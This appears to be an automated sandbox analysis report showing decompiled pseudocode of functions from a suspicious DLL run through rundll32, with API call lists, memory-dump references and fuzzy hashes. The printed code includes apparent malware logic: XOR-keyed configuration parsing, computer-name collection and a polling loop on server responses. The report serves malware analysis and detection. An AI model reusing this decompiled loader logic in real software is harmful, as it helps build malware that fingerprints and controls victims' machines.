                                			E042876E7(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E04288A19(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x428d2a8; // 0xaea5a8
						_t20 = _t68 + 0x428e1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E0428A6BC(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}





















                                0x042876ed
                                0x042876f0
                                0x04287700
                                0x04287709
                                0x0428770d
                                0x042877db
                                0x042877e1
                                0x042877e1
                                0x04287727
                                0x0428772c
                                0x04287730
                                0x04287736
                                0x0428773b
                                0x04287742
                                0x04287751
                                0x04287751
                                0x04287755
                                0x04287757
                                0x04287763
                                0x0428776e
                                0x04287779
                                0x0428777d
                                0x04287787
                                0x0428778b
                                0x0428778d
                                0x04287792
                                0x04287799
                                0x042877a9
                                0x042877a9
                                0x04287792
                                0x0428778b
                                0x042877ab
                                0x042877b0
                                0x042877b5
                                0x042877b5
                                0x042877b8
                                0x042877c1
                                0x042877c6
                                0x042877c6
                                0x042877cb
                                0x042877d0
                                0x042877d0
                                0x042877cb
                                0x04287755
                                0x042877d2
                                0x042877d8
                                0x00000000

                                APIs
                                  • Part of subcall function 04288A19: SysAllocString.OLEAUT32(80000002), ref: 04288A76
                                  • Part of subcall function 04288A19: SysFreeString.OLEAUT32(00000000), ref: 04288ADC
                                • SysFreeString.OLEAUT32(?), ref: 042877C6
                                • SysFreeString.OLEAUT32(04284BD8), ref: 042877D0
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: String$Free$Alloc
                                • String ID:
                                • API String ID: 986138563-0
                                • Opcode ID: f299c815e71c8d3fa5ebbde5d2305e222f983fa348ce35e97d33d57d65eb7de6
                                • Instruction ID: 2de8641dd6250699bdbe08b130290a418cbd3b0d1abc0640b3101035695507e7
                                • Opcode Fuzzy Hash: f299c815e71c8d3fa5ebbde5d2305e222f983fa348ce35e97d33d57d65eb7de6
                                • Instruction Fuzzy Hash: C7315A76610119AFCB11EF58CC88C9FBB79FFC97447244698F9059B2A0E231ED91CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04285D79, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 43memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E04285D79(intOrPtr* __edi, void* _a4, intOrPtr _a8, unsigned int _a12) {
				void* _t21;
				void* _t22;
				signed int _t24;
				intOrPtr* _t26;
				void* _t27;

				_t26 = __edi;
				if(_a4 == 0) {
					L2:
					_t27 = E04287DDD(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
					if(_t27 == 0) {
						_t24 = _a12 >> 1;
						if(_t24 == 0) {
							_t27 = 2;
							HeapFree( *0x428d238, 0, _a4);
						} else {
							_t21 = _a4;
							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
							 *_t26 = _t21;
						}
					}
					L6:
					return _t27;
				}
				_t22 = E04281037(_a4, _a8, _a12, __edi); // executed
				_t27 = _t22;
				if(_t27 == 0) {
					goto L6;
				}
				goto L2;
			}








                                0x04285d79
                                0x04285d81
                                0x04285d98
                                0x04285db3
                                0x04285db7
                                0x04285dbc
                                0x04285dbe
                                0x04285dd0
                                0x04285ddc
                                0x04285dc0
                                0x04285dc0
                                0x04285dc5
                                0x04285dca
                                0x04285dca
                                0x04285dbe
                                0x04285de2
                                0x04285de6
                                0x04285de6
                                0x04285d8d
                                0x04285d92
                                0x04285d96
                                0x00000000
                                0x00000000
                                0x00000000

                                APIs
                                  • Part of subcall function 04281037: SysFreeString.OLEAUT32(00000000), ref: 0428109A
                                • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,74E5F710,?,00000000,?,00000000,?,04285356,?,004F0053,04D79368,00000000,?), ref: 04285DDC
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: Free$HeapString
                                • String ID: Ut
                                • API String ID: 3806048269-8415677
                                • Opcode ID: 1341055beaacb5f1fa7cae7fe20b3c3384b16aede5e7d3541c44c67c1ad66e90
                                • Instruction ID: d1cc995a3f48134f6195bb81633eed029acb7245deddd04aa32cd71adb0ee0d0
                                • Opcode Fuzzy Hash: 1341055beaacb5f1fa7cae7fe20b3c3384b16aede5e7d3541c44c67c1ad66e90
                                • Instruction Fuzzy Hash: E1014F3221261AFBDF22AF54CC04FEE7B65EF04790F148019FE059A1A0D731E960DB90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0428831C, Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                                Download Yara Rule
                                C-Code - Quality: 37%
                                			E0428831C(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E04281525(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E04288B22(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}









                                0x04288321
                                0x0428832c
                                0x0428832e
                                0x04288334
                                0x04288336
                                0x0428833b
                                0x04288344
                                0x04288348
                                0x04288351
                                0x04288355
                                0x04288364
                                0x04288357
                                0x04288358
                                0x0428835d
                                0x0428835d
                                0x04288355
                                0x04288348
                                0x0428836d

                                APIs
                                • GetComputerNameExA.KERNEL32(00000003,00000000,04289C7E,74E5F710,00000000,?,?,04289C7E), ref: 04288334
                                  • Part of subcall function 04281525: RtlAllocateHeap.NTDLL(00000000,00000000,04281278), ref: 04281531
                                • GetComputerNameExA.KERNEL32(00000003,00000000,04289C7E,04289C7F,?,?,04289C7E), ref: 04288351
                                  • Part of subcall function 04288B22: RtlFreeHeap.NTDLL(00000000,00000000,0428131A,00000000,?,?,00000000), ref: 04288B2E
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: ComputerHeapName$AllocateFree
                                • String ID:
                                • API String ID: 187446995-0
                                • Opcode ID: ddd5b48a48e6c6b69690b77f042120f49b44cb1aa6c95ef499c862571f08236d
                                • Instruction ID: c070baae042dd35decbd0250c3717040a1befe024220dba29d02e2d0b049b3f7
                                • Opcode Fuzzy Hash: ddd5b48a48e6c6b69690b77f042120f49b44cb1aa6c95ef499c862571f08236d
                                • Instruction Fuzzy Hash: C3F05476721206BEEB21F69E9C00EAFB6FCEBC5650F51105DA505D3181EA70EE01E770
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04287EFD, Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t14;

				_t14 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0x428d23c) == 0) {
						E04284DB1();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0x428d23c) == 1) {
						_t10 = E04282789(_t11, _t12, _a4); // executed
						if(_t10 != 0) {
							_t14 = 0;
						}
					}
				}
				return _t14;
			}








                                0x04287f04
                                0x04287f05
                                0x04287f08
                                0x04287f3a
                                0x04287f3c
                                0x04287f3c
                                0x04287f0a
                                0x04287f0b
                                0x04287f20
                                0x04287f27
                                0x04287f29
                                0x04287f29
                                0x04287f27
                                0x04287f0b
                                0x04287f44

                                APIs
                                • InterlockedIncrement.KERNEL32(0428D23C), ref: 04287F12
                                  • Part of subcall function 04282789: HeapCreate.KERNEL32(00000000,00400000,00000000,?,00000001,?,?,?,04287F25,?), ref: 0428279C
                                • InterlockedDecrement.KERNEL32(0428D23C), ref: 04287F32
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: Interlocked$CreateDecrementHeapIncrement
                                • String ID:
                                • API String ID: 3834848776-0
                                • Opcode ID: 6ee253a57a4367ba1e4d13155594888b03530237f5c46b783915229f234bdc93
                                • Instruction ID: fd1cfbf9e18aa32633c8136072b16d193ceca35591e22a58d79b66ac1e211b67
                                • Opcode Fuzzy Hash: 6ee253a57a4367ba1e4d13155594888b03530237f5c46b783915229f234bdc93
                                • Instruction Fuzzy Hash: 61E04F3133B123939B217A779C48B6EA640BBA07C4F25D46CF481D10D6D690E84096E1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0428933A, Relevance: 1.6, APIs: 1, Instructions: 70synchronizationCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E0428933A(signed int* __ecx, intOrPtr _a4, signed int* _a8, signed int* _a12) {
				intOrPtr _v12;
				signed int _v20;
				intOrPtr _v24;
				signed int _v60;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t14;
				signed int* _t16;
				signed int _t25;
				signed int _t26;
				signed int* _t28;
				signed int _t30;

				_t28 = __ecx;
				_t14 =  *0x428d2c8; // 0x4d79618
				_v12 = _t14;
				_t16 = _a12;
				_t30 = 8;
				if(_t16 != 0) {
					 *_t16 =  *_t16 & 0x00000000;
				}
				do {
					_t31 =  &_v68;
					if(E04288C01( &_v68) == 0) {
						goto L16;
					}
					_t30 = E042897F7(_t31, _a4, _v12);
					if(_t30 == 0) {
						_t25 = E04285988(_t31, _t28); // executed
						_t30 = _t25;
						if(_t30 != 0) {
							if(_t30 == 0x102) {
								E0428D000 = E0428D000 + 0xea60;
							}
						} else {
							if(_v24 != 0xc8) {
								_t30 = 0xe8;
							} else {
								_t26 = _v20;
								if(_t26 == 0) {
									_t30 = 0x10d2;
								} else {
									_t28 = _a8;
									if(_t28 != 0) {
										_v60 = _v60 & _t30;
										 *_t28 = _v60;
										_t28 = _a12;
										if(_t28 != 0) {
											 *_t28 = _t26;
										}
									}
								}
							}
						}
					}
					E042858DB( &_v68, 0x102, _t28, _t30);
					L16:
				} while (_t30 == 0x2f19 && WaitForSingleObject( *0x428d26c, 0) == 0x102);
				return _t30;
			}

















                                0x0428933a
                                0x04289340
                                0x04289347
                                0x0428934f
                                0x04289355
                                0x04289358
                                0x0428935a
                                0x0428935a
                                0x04289362
                                0x04289362
                                0x0428936c
                                0x00000000
                                0x00000000
                                0x0428937b
                                0x0428937f
                                0x04289383
                                0x04289388
                                0x0428938c
                                0x042893c8
                                0x042893ca
                                0x042893ca
                                0x0428938e
                                0x04289395
                                0x042893bf
                                0x04289397
                                0x04289397
                                0x0428939c
                                0x042893b8
                                0x0428939e
                                0x0428939e
                                0x042893a3
                                0x042893a8
                                0x042893ab
                                0x042893ad
                                0x042893b2
                                0x042893b4
                                0x042893b4
                                0x042893b2
                                0x042893a3
                                0x0428939c
                                0x04289395
                                0x0428938c
                                0x042893d7
                                0x042893dc
                                0x042893dc
                                0x04289400

                                APIs
                                • WaitForSingleObject.KERNEL32(00000000,00000000,00000000,74E481D0), ref: 042893EC
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: ObjectSingleWait
                                • String ID:
                                • API String ID: 24740636-0
                                • Opcode ID: d830422fc399954fabd02d1db6325a416042561eedbc46e40138192a37b85fe5
                                • Instruction ID: 5be8ebad3c1ff0dee52657e87e5ba5c7de579cc44a6492af784ee3155d6f1a6a
                                • Opcode Fuzzy Hash: d830422fc399954fabd02d1db6325a416042561eedbc46e40138192a37b85fe5
                                • Instruction Fuzzy Hash: 73216DB172220A9BEF11FE5DE854B7EB7A5AB80354F11402DE401A72E0DBB4FC85C750
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04281037, Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                Download Yara Rule
                                C-Code - Quality: 34%
                                			E04281037(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				char _v20;
				intOrPtr _t15;
				void* _t17;
				intOrPtr _t19;
				void* _t23;

				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x428d2a8; // 0xaea5a8
				_t4 = _t15 + 0x428e39c; // 0x4d78944
				_t20 = _t4;
				_t6 = _t15 + 0x428e124; // 0x650047
				_t17 = E042876E7(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					_t23 = 8;
					if(_v20 != _t23) {
						_t23 = 1;
					} else {
						_t19 = E04287EA4(_t20, _v12);
						if(_t19 != 0) {
							 *_a16 = _t19;
							_t23 = 0;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}










                                0x04281041
                                0x04281048
                                0x04281049
                                0x0428104a
                                0x0428104b
                                0x04281051
                                0x04281056
                                0x04281056
                                0x04281060
                                0x04281072
                                0x04281079
                                0x042810a7
                                0x0428107b
                                0x0428107d
                                0x04281082
                                0x042810a4
                                0x04281084
                                0x04281087
                                0x0428108e
                                0x04281093
                                0x04281095
                                0x04281095
                                0x0428109a
                                0x0428109a
                                0x04281082
                                0x042810ae

                                APIs
                                  • Part of subcall function 042876E7: SysFreeString.OLEAUT32(?), ref: 042877C6
                                  • Part of subcall function 04287EA4: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,042851D4,004F0053,00000000,?), ref: 04287EAD
                                  • Part of subcall function 04287EA4: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,042851D4,004F0053,00000000,?), ref: 04287ED7
                                  • Part of subcall function 04287EA4: memset.NTDLL ref: 04287EEB
                                • SysFreeString.OLEAUT32(00000000), ref: 0428109A
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: FreeString$lstrlenmemcpymemset
                                • String ID:
                                • API String ID: 397948122-0
                                • Opcode ID: a940456874d9983f5f362df7f0782c9fbabbea9fbbac02764933ad20608c96df
                                • Instruction ID: b2c3203e03f6e65d44e86dd9fb4c34776740a68e52e23bef79844fd2a21acd4e
                                • Opcode Fuzzy Hash: a940456874d9983f5f362df7f0782c9fbabbea9fbbac02764933ad20608c96df
                                • Instruction Fuzzy Hash: 9A014C32721169BEDB11AAA9DC04DAEBBB8EB45650B004529E904E60E1E771ED22C790
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Non-executed Functions

                                Function 04287FBE, Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 258memoryCOMMONCrypto
                                Download Yara Rule
                                C-Code - Quality: 96%
                                			E04287FBE(int* __ecx) {
				int _v8;
				void* _v12;
				void* _v16;
				void* __esi;
				signed int _t28;
				signed int _t33;
				signed int _t39;
				char* _t45;
				char* _t46;
				char* _t47;
				char* _t48;
				char* _t49;
				char* _t50;
				void* _t51;
				void* _t52;
				void* _t53;
				intOrPtr _t54;
				void* _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				signed int _t61;
				intOrPtr _t64;
				signed int _t65;
				signed int _t70;
				void* _t72;
				void* _t73;
				signed int _t75;
				signed int _t78;
				signed int _t82;
				signed int _t86;
				signed int _t90;
				signed int _t94;
				signed int _t98;
				void* _t103;
				intOrPtr _t121;

				_t104 = __ecx;
				_t28 =  *0x428d2a4; // 0x69b25f44
				if(E04286247( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x90) {
					 *0x428d2d8 = _v8;
				}
				_t33 =  *0x428d2a4; // 0x69b25f44
				if(E04286247( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
					_v12 = 2;
					L69:
					return _v12;
				}
				_t39 =  *0x428d2a4; // 0x69b25f44
				if(E04286247( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
					L67:
					HeapFree( *0x428d238, 0, _v16);
					goto L69;
				} else {
					_t103 = _v12;
					if(_t103 == 0) {
						_t45 = 0;
					} else {
						_t98 =  *0x428d2a4; // 0x69b25f44
						_t45 = E04289403(_t104, _t103, _t98 ^ 0x7895433b);
					}
					if(_t45 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0x428d240 = _v8;
						}
					}
					if(_t103 == 0) {
						_t46 = 0;
					} else {
						_t94 =  *0x428d2a4; // 0x69b25f44
						_t46 = E04289403(_t104, _t103, _t94 ^ 0x219b08c7);
					}
					if(_t46 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0x428d244 = _v8;
						}
					}
					if(_t103 == 0) {
						_t47 = 0;
					} else {
						_t90 =  *0x428d2a4; // 0x69b25f44
						_t47 = E04289403(_t104, _t103, _t90 ^ 0x31fc0661);
					}
					if(_t47 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0x428d248 = _v8;
						}
					}
					if(_t103 == 0) {
						_t48 = 0;
					} else {
						_t86 =  *0x428d2a4; // 0x69b25f44
						_t48 = E04289403(_t104, _t103, _t86 ^ 0x0cd926ce);
					}
					if(_t48 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
							 *0x428d004 = _v8;
						}
					}
					if(_t103 == 0) {
						_t49 = 0;
					} else {
						_t82 =  *0x428d2a4; // 0x69b25f44
						_t49 = E04289403(_t104, _t103, _t82 ^ 0x3cd8b2cb);
					}
					if(_t49 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
							 *0x428d02c = _v8;
						}
					}
					if(_t103 == 0) {
						_t50 = 0;
					} else {
						_t78 =  *0x428d2a4; // 0x69b25f44
						_t50 = E04289403(_t104, _t103, _t78 ^ 0x2878b929);
					}
					if(_t50 == 0) {
						L41:
						 *0x428d24c = 5;
						goto L42;
					} else {
						_t104 =  &_v8;
						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
							goto L41;
						} else {
							L42:
							if(_t103 == 0) {
								_t51 = 0;
							} else {
								_t75 =  *0x428d2a4; // 0x69b25f44
								_t51 = E04289403(_t104, _t103, _t75 ^ 0x261a367a);
							}
							if(_t51 != 0) {
								_push(_t51);
								_t72 = 0x10;
								_t73 = E0428A0FD(_t72);
								if(_t73 != 0) {
									_push(_t73);
									E04289FF6();
								}
							}
							if(_t103 == 0) {
								_t52 = 0;
							} else {
								_t70 =  *0x428d2a4; // 0x69b25f44
								_t52 = E04289403(_t104, _t103, _t70 ^ 0xb9d404b2);
							}
							if(_t52 != 0 && E0428A0FD(0, _t52) != 0) {
								_t121 =  *0x428d32c; // 0x4d795b0
								E04281128(_t121 + 4, _t68);
							}
							if(_t103 == 0) {
								_t53 = 0;
							} else {
								_t65 =  *0x428d2a4; // 0x69b25f44
								_t53 = E04289403(_t104, _t103, _t65 ^ 0x3df17130);
							}
							if(_t53 == 0) {
								L59:
								_t54 =  *0x428d2a8; // 0xaea5a8
								_t22 = _t54 + 0x428e252; // 0x616d692f
								 *0x428d2d4 = _t22;
								goto L60;
							} else {
								_t64 = E0428A0FD(0, _t53);
								 *0x428d2d4 = _t64;
								if(_t64 != 0) {
									L60:
									if(_t103 == 0) {
										_t56 = 0;
									} else {
										_t61 =  *0x428d2a4; // 0x69b25f44
										_t56 = E04289403(_t104, _t103, _t61 ^ 0xd2079859);
									}
									if(_t56 == 0) {
										_t57 =  *0x428d2a8; // 0xaea5a8
										_t23 = _t57 + 0x428e791; // 0x6976612e
										_t58 = _t23;
									} else {
										_t58 = E0428A0FD(0, _t56);
									}
									 *0x428d340 = _t58;
									HeapFree( *0x428d238, 0, _t103);
									_v12 = 0;
									goto L67;
								}
								goto L59;
							}
						}
					}
				}
			}






































                                0x04287fbe
                                0x04287fc1
                                0x04287fe1
                                0x04287fef
                                0x04287fef
                                0x04287ff4
                                0x0428800e
                                0x04288276
                                0x0428827d
                                0x04288284
                                0x04288284
                                0x04288014
                                0x04288030
                                0x04288264
                                0x0428826e
                                0x00000000
                                0x04288036
                                0x04288036
                                0x0428803b
                                0x04288051
                                0x0428803d
                                0x0428803d
                                0x0428804a
                                0x0428804a
                                0x0428805b
                                0x0428805d
                                0x04288067
                                0x0428806c
                                0x0428806c
                                0x04288067
                                0x04288073
                                0x04288089
                                0x04288075
                                0x04288075
                                0x04288082
                                0x04288082
                                0x0428808d
                                0x0428808f
                                0x04288099
                                0x0428809e
                                0x0428809e
                                0x04288099
                                0x042880a5
                                0x042880bb
                                0x042880a7
                                0x042880a7
                                0x042880b4
                                0x042880b4
                                0x042880bf
                                0x042880c1
                                0x042880cb
                                0x042880d0
                                0x042880d0
                                0x042880cb
                                0x042880d7
                                0x042880ed
                                0x042880d9
                                0x042880d9
                                0x042880e6
                                0x042880e6
                                0x042880f1
                                0x042880f3
                                0x042880fd
                                0x04288102
                                0x04288102
                                0x042880fd
                                0x04288109
                                0x0428811f
                                0x0428810b
                                0x0428810b
                                0x04288118
                                0x04288118
                                0x04288123
                                0x04288125
                                0x0428812f
                                0x04288134
                                0x04288134
                                0x0428812f
                                0x0428813b
                                0x04288151
                                0x0428813d
                                0x0428813d
                                0x0428814a
                                0x0428814a
                                0x04288155
                                0x04288168
                                0x04288168
                                0x00000000
                                0x04288157
                                0x04288157
                                0x04288161
                                0x00000000
                                0x04288172
                                0x04288172
                                0x04288174
                                0x0428818a
                                0x04288176
                                0x04288176
                                0x04288183
                                0x04288183
                                0x0428818e
                                0x04288190
                                0x04288193
                                0x04288194
                                0x0428819b
                                0x0428819d
                                0x0428819e
                                0x0428819e
                                0x0428819b
                                0x042881a5
                                0x042881bb
                                0x042881a7
                                0x042881a7
                                0x042881b4
                                0x042881b4
                                0x042881bf
                                0x042881cd
                                0x042881d7
                                0x042881d7
                                0x042881de
                                0x042881f4
                                0x042881e0
                                0x042881e0
                                0x042881ed
                                0x042881ed
                                0x042881f8
                                0x0428820b
                                0x0428820b
                                0x04288210
                                0x04288216
                                0x00000000
                                0x042881fa
                                0x042881fd
                                0x04288202
                                0x04288209
                                0x0428821b
                                0x0428821d
                                0x04288233
                                0x0428821f
                                0x0428821f
                                0x0428822c
                                0x0428822c
                                0x04288237
                                0x04288243
                                0x04288248
                                0x04288248
                                0x04288239
                                0x0428823c
                                0x0428823c
                                0x04288256
                                0x0428825b
                                0x04288261
                                0x00000000
                                0x04288261
                                0x00000000
                                0x04288209
                                0x042881f8
                                0x04288161
                                0x04288155

                                APIs
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,042830F3,?,69B25F44,?,042830F3,69B25F44,?,042830F3,69B25F44,00000005,0428D00C,00000008), ref: 04288063
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,042830F3,?,69B25F44,?,042830F3,69B25F44,?,042830F3,69B25F44,00000005,0428D00C,00000008), ref: 04288095
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,042830F3,?,69B25F44,?,042830F3,69B25F44,?,042830F3,69B25F44,00000005,0428D00C,00000008), ref: 042880C7
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,042830F3,?,69B25F44,?,042830F3,69B25F44,?,042830F3,69B25F44,00000005,0428D00C,00000008), ref: 042880F9
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,042830F3,?,69B25F44,?,042830F3,69B25F44,?,042830F3,69B25F44,00000005,0428D00C,00000008), ref: 0428812B
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,042830F3,?,69B25F44,?,042830F3,69B25F44,?,042830F3,69B25F44,00000005,0428D00C,00000008), ref: 0428815D
                                • HeapFree.KERNEL32(00000000,042830F3,042830F3,?,69B25F44,?,042830F3,69B25F44,?,042830F3,69B25F44,00000005,0428D00C,00000008,?,042830F3), ref: 0428825B
                                • HeapFree.KERNEL32(00000000,?,042830F3,?,69B25F44,?,042830F3,69B25F44,?,042830F3,69B25F44,00000005,0428D00C,00000008,?,042830F3), ref: 0428826E
                                  • Part of subcall function 0428A0FD: lstrlen.KERNEL32(69B25F44,00000000,7673D3B0,042830F3,04288241,00000000,042830F3,?,69B25F44,?,042830F3,69B25F44,?,042830F3,69B25F44,00000005), ref: 0428A106
                                  • Part of subcall function 0428A0FD: memcpy.NTDLL(00000000,?,00000000,00000001,?,042830F3), ref: 0428A129
                                  • Part of subcall function 0428A0FD: memset.NTDLL ref: 0428A138
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
